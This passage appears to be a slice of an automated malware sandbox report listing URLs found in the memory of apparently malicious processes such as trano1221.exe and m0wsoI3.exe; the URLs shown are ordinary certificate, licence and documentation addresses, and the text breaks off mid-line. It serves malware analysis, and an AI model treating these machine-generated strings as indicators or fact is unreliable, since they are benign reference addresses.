                                      Source: trano1221.exe, 0000002A.00000003.1839066325.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1947614092.000001E16BB74000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806684147.000001E16BB72000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831815877.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1889510027.000001E16BB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822821086.000001E16B5FD000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883429141.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1904737697.000001E16BB65000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815572881.000001E16B5F2000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807091152.000001E16BB58000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835977069.000001E16B60B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1823085657.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811187330.000001E16BB5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                      Source: trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                      Source: trano1221.exe, 0000002A.00000003.1683030296.000001E16B67B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1683030296.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811511333.000001E16BC7C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816958267.000001E16B6D6000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779497201.000001E16BC70000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891690088.000001E16B6D7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1770432200.000001E16BC53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816958267.000001E16B6D6000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891690088.000001E16B6D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/c
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/i%;
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CDD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883429141.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1904737697.000001E16BB65000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807091152.000001E16BB58000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1823085657.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946800540.000001E16BB66000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811187330.000001E16BB5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timelessrepo.com/json-isnt-a-javascript-subset).
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882867348.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893387743.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl4
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htmr
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                      Source: trano1221.exe, 00000023.00000003.1609567595.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                                      Source: trano1221.exe, 00000023.00000003.1610178975.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609567595.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609567595.0000013C2C401000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1610647899.0000013C2C402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881513489.000001E16B527000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1851441531.000001E16C636000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1814171740.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 